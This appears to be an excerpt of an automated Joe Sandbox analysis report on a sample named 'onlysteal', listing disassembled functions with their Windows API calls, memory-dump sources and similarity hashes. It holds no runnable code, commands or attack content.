                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00238289
                                        • Part of subcall function 002313DC: __EH_prolog.LIBCMT ref: 002313E1
                                        • Part of subcall function 0023A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0023A598
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog$CloseFind
                                      • String ID:
                                      • API String ID: 2506663941-0
                                      • Opcode ID: 1f15db41a7d041152209d390b0b203b710c4c43571d85a434b9a65c8b434e341
                                      • Instruction ID: 2f1ffdd65131cc7fcd33c7b21e41a2ed00b1cdb69647e9db1a00ccd033db12d3
                                      • Opcode Fuzzy Hash: 1f15db41a7d041152209d390b0b203b710c4c43571d85a434b9a65c8b434e341
                                      • Instruction Fuzzy Hash: 5741C7B19247599ADB24DB60CC55AEAB378BF00304F0404EBF18AAB182EB705ED9CF10
                                      Function 002313E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 002313E1
                                        • Part of subcall function 00235E37: __EH_prolog.LIBCMT ref: 00235E3C
                                        • Part of subcall function 0023CE40: __EH_prolog.LIBCMT ref: 0023CE45
                                        • Part of subcall function 0023B505: __EH_prolog.LIBCMT ref: 0023B50A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 87da16c59abf700a144aed23f4e0f6e8d00b8cc656c3da1c6226d47c016fbd14
                                      • Instruction ID: b5b16915be42cc6f4ee1cfaaabc2594de551a8dfbe1054b68e6728ac90254fc0
                                      • Opcode Fuzzy Hash: 87da16c59abf700a144aed23f4e0f6e8d00b8cc656c3da1c6226d47c016fbd14
                                      • Instruction Fuzzy Hash: 444129B0915B409EE724DF798885AE6FAE5BF19300F51492ED5FF83282CB716664CF10
                                      Function 002313DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 002313E1
                                        • Part of subcall function 00235E37: __EH_prolog.LIBCMT ref: 00235E3C
                                        • Part of subcall function 0023CE40: __EH_prolog.LIBCMT ref: 0023CE45
                                        • Part of subcall function 0023B505: __EH_prolog.LIBCMT ref: 0023B50A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 99a1ede1c22d7761d1cd0d163ef36647e41cf6015ffbbcbb869f6b96b60a70c8
                                      • Instruction ID: c80a1ad28745e65bd8c74a37781e3dbb5b3f4b4bbbcd9dc32f98dda7cbaf05ae
                                      • Opcode Fuzzy Hash: 99a1ede1c22d7761d1cd0d163ef36647e41cf6015ffbbcbb869f6b96b60a70c8
                                      • Instruction Fuzzy Hash: 294137B0915B409AE724DF798885AE6FAE5BF19300F51492ED5FF83282CB726664CF10
                                      Function 0024B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0024B098
                                        • Part of subcall function 002313DC: __EH_prolog.LIBCMT ref: 002313E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: e8684f03b78d83dcd3ad53c637fba6aa8d6ca41b3502b206104e8b3d9dd0faa4
                                      • Instruction ID: f12aa12be46c08d57d0528825d8f68691c4cc670e600b854c1e97edf81078e8e
                                      • Opcode Fuzzy Hash: e8684f03b78d83dcd3ad53c637fba6aa8d6ca41b3502b206104e8b3d9dd0faa4
                                      • Instruction Fuzzy Hash: 4E317C75C20249EBDF19DFA8C951AEEBBB4AF09304F10449EE409B7242D775AE24CF61
                                      Function 0025AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,00263A34), ref: 0025ACF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: 9c2c754ed0c436809ce1f39e46d834e42ae5bf64015dd11e556a574ff4598acd
                                      • Instruction ID: 2b81917f2b53524a4428c0db3bd1eb0cf9756e2e09c3fc3ba4c86d2b87405ef9
                                      • Opcode Fuzzy Hash: 9c2c754ed0c436809ce1f39e46d834e42ae5bf64015dd11e556a574ff4598acd
                                      • Instruction Fuzzy Hash: DF113A376212265F8F22EE1CEC4685AB3A5AB843237168321FD15EF254D730DC1587D6
                                      Function 0023CE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0023CE45
                                        • Part of subcall function 00235E37: __EH_prolog.LIBCMT ref: 00235E3C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 41f0945c4c76c568ff52a5a229c1f6c254b1b8b91ea455c2f7ff9e0759ffa418
                                      • Instruction ID: b0040ab66a2baa065636709ed911dce1c44c4997a339bd8c04dfc8e49da374e7
                                      • Opcode Fuzzy Hash: 41f0945c4c76c568ff52a5a229c1f6c254b1b8b91ea455c2f7ff9e0759ffa418
                                      • Instruction Fuzzy Hash: 2E11A3B1A21244DEEB14DB79C5057AEF7E8EF44300F20446EE486E3282DBB49E14CF62
                                      Function 00239215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: f14fbd7f3352422ab6364d081878ed321b46425f6a2cee7712b896b566dbfc0b
                                      • Instruction ID: 0b3e56718c49dd59057820d20be02dc07c8182c00b8825490ba9f083e09079e1
                                      • Opcode Fuzzy Hash: f14fbd7f3352422ab6364d081878ed321b46425f6a2cee7712b896b566dbfc0b
                                      • Instruction Fuzzy Hash: 9E01A5B3D20929ABCF11AFA8CC919DFB735BF89740F014515EC16B7112DA748D65CAA0
                                      Function 0025C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0025B136: RtlAllocateHeap.NTDLL(00000008,00263A34,00000000,?,0025989A,00000001,00000364,?,?,?,0023D984,?,?,?,00000004,0023D710), ref: 0025B177
                                      • _free.LIBCMT ref: 0025C4E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                      • Instruction ID: 7273d03f175e5b0e8d98e45fdf492918ce310f673c8df33dfca4d1e112e73d4e
                                      • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                      • Instruction Fuzzy Hash: 0A0126722103066FE3318E659881D6AFBE9FB85331F25061DE98483281FA30A809CB38
                                      Function 0025B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00263A34,00000000,?,0025989A,00000001,00000364,?,?,?,0023D984,?,?,?,00000004,0023D710), ref: 0025B177
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 7f1ffcb83658e36159c2b415bd9fd3c34a7d70497f3e50bd79e4da66abb7d14d
                                      • Instruction ID: f9ba45fba37cd646f852a258673db1878290ad0b7af8411346afe9e3a06cee5c
                                      • Opcode Fuzzy Hash: 7f1ffcb83658e36159c2b415bd9fd3c34a7d70497f3e50bd79e4da66abb7d14d
                                      • Instruction Fuzzy Hash: 21F0B432535926B7DFA25E71AC29B5E3748AB41772B18C112FC0CA6190CB70DD2D86EC
                                      Function 00253C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00253C3F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: f4a499b980233a3498de02bc57f19b0d8fc4a61c1a339524dfbeb332751a84ba
                                      • Instruction ID: b70d8a1fb109ea0479968c445cd587bbdb20b4a35ed04810f052f13115507da8
                                      • Opcode Fuzzy Hash: f4a499b980233a3498de02bc57f19b0d8fc4a61c1a339524dfbeb332751a84ba
                                      • Instruction Fuzzy Hash: 0DF0A7332242179F8F11CEA8FC0499A7799EF01BA37105126FE05E7190DB31DA34C794
                                      Function 00258E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 95cf15ececbbdb612c403531f32f36dbc73843ae1be6f0eab1fd3c81237d8a84
                                      • Instruction ID: 0f3eec2fc486d9e68b8a78aa489e53cc2d9ca1ed94baccdc9fe962acdcb51907
                                      • Opcode Fuzzy Hash: 95cf15ececbbdb612c403531f32f36dbc73843ae1be6f0eab1fd3c81237d8a84
                                      • Instruction Fuzzy Hash: 84E0E53123212656EA712E21AC0AB5F36689B413A3F110111BC09B6091DFF0CC3885ED
                                      Function 00235ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00235AC2
                                        • Part of subcall function 0023B505: __EH_prolog.LIBCMT ref: 0023B50A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ad280497cbedcd2a15fc116ff2aa1a20605dce72d11d14ce6e90e8e61cd3696a
                                      • Instruction ID: e52a1d2266fdb9464e9ade82d79d3894a635d5654817869e887edbc502bbea82
                                      • Opcode Fuzzy Hash: ad280497cbedcd2a15fc116ff2aa1a20605dce72d11d14ce6e90e8e61cd3696a
                                      • Instruction Fuzzy Hash: BF018170420690DAD719EBB8C081BDDF7A8DF64304F51848DA56753282CBB41B28DBA2
                                      Function 0023A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0023A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6C4
                                        • Part of subcall function 0023A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6F2
                                        • Part of subcall function 0023A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6FE
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0023A598
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Find$FileFirst$CloseErrorLast
                                      • String ID:
                                      • API String ID: 1464966427-0
                                      • Opcode ID: 740766d701b689d74513cadf8bb289b1dda93a0d6b04a2ab23bbe3e1d5fd008f
                                      • Instruction ID: e10d839be1745cf46fe20ebead7739d6853fa5ccf63280c5dee3f684359e3844
                                      • Opcode Fuzzy Hash: 740766d701b689d74513cadf8bb289b1dda93a0d6b04a2ab23bbe3e1d5fd008f
                                      • Instruction Fuzzy Hash: 64F08271428790AACB225BB48905BCB7B946F1A331F048A4DF5FD52196C2B550A89F23
                                      Function 00240E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00240E3D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      • Opcode ID: 2ec172c43d4fe43b365488843f12bafe3bc2c03dee8cdd70078ca6746da4db8c
                                      • Instruction ID: 0cd676287021d60fb0920455e393154a82b0e038459527bf1ad32893c37d0d86
                                      • Opcode Fuzzy Hash: 2ec172c43d4fe43b365488843f12bafe3bc2c03dee8cdd70078ca6746da4db8c
                                      • Instruction Fuzzy Hash: BED0C210B3105526DB193728285D7FE390A8FD6314F0C4426F5495B1C2CAA848F6A661
                                      Function 0024A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 0024A62C
                                        • Part of subcall function 0024A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0024A3DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction ID: ec272aa8e653ae066e2aaa5910b47ac8b11e9913a44067d26432a296d80efb80
                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction Fuzzy Hash: 3FD0C9712B0209BAEF4AAF618C1296E7A99FB00344F058125B842D5192EAB1D930AA66
                                      Function 0024DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00241B3E), ref: 0024DD92
                                        • Part of subcall function 0024B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                        • Part of subcall function 0024B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                        • Part of subcall function 0024B568: IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                        • Part of subcall function 0024B568: TranslateMessage.USER32(?), ref: 0024B5AC
                                        • Part of subcall function 0024B568: DispatchMessageW.USER32(?), ref: 0024B5B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: be16508eea4b133f07800f2db739b0d8fc4a058b142e6d1be7799099bac4732c
                                      • Instruction ID: 35f047a65a993c438b8ff7ac7d2d9a94aa4e49a10c5e24aeb6e29b2422ce1a8a
                                      • Opcode Fuzzy Hash: be16508eea4b133f07800f2db739b0d8fc4a058b142e6d1be7799099bac4732c
                                      • Instruction Fuzzy Hash: 90D0C731154300BAD6026B51DD0AF0F7AE2BB88F08F404955B388740F1C6B2DD71DF11
                                      Function 0024E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DloadProtectSection.DELAYIMP ref: 0024E5E3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
